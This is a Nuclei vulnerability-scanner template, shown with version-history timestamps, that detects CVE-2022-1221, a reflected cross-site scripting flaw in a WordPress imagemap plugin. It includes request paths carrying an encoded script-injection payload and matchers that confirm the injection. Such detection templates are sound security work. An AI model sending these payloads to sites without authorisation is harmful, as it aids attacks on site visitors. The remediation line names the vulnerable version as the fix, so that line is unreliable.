nuclei-templates/http/cves/2022/CVE-2022-1221.yaml

57 lines
2.4 KiB
YAML
Raw Normal View History

2022-05-11 13:20:31 +00:00
id: CVE-2022-1221
2022-05-11 13:17:48 +00:00
info:
name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting
2022-05-11 13:17:48 +00:00
author: veshraj
severity: medium
2022-05-11 13:17:48 +00:00
description: |
Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation: |
Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability.
2022-05-11 13:17:48 +00:00
reference:
- https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221
- https://nvd.nist.gov/vuln/detail/CVE-2022-1221
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1221
cwe-id: CWE-79
epss-score: 0.00106
epss-percentile: 0.42899
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:*
2022-05-11 18:58:12 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: gwyn\'s_imagemap_selector_project
product: gwyn\'s_imagemap_selector
2023-09-06 11:59:08 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project
2022-05-11 13:17:48 +00:00
http:
2022-05-11 13:17:48 +00:00
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2022-05-11 18:58:12 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2022-05-11 13:17:48 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-05-11 18:58:12 +00:00
- "</script><script>alert(document.domain)</script> popup-"
2022-05-11 13:17:48 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502204a1db6991ecca761ab05cf5bd4fd48efc3fcbc37c6356abcfd41f57f46c25685022100d22a3098a42028bf2f1c2ac71fb0f7696512384b02e3092f02acc8f021093e84:922c64590222798bb761d5b6d8e72950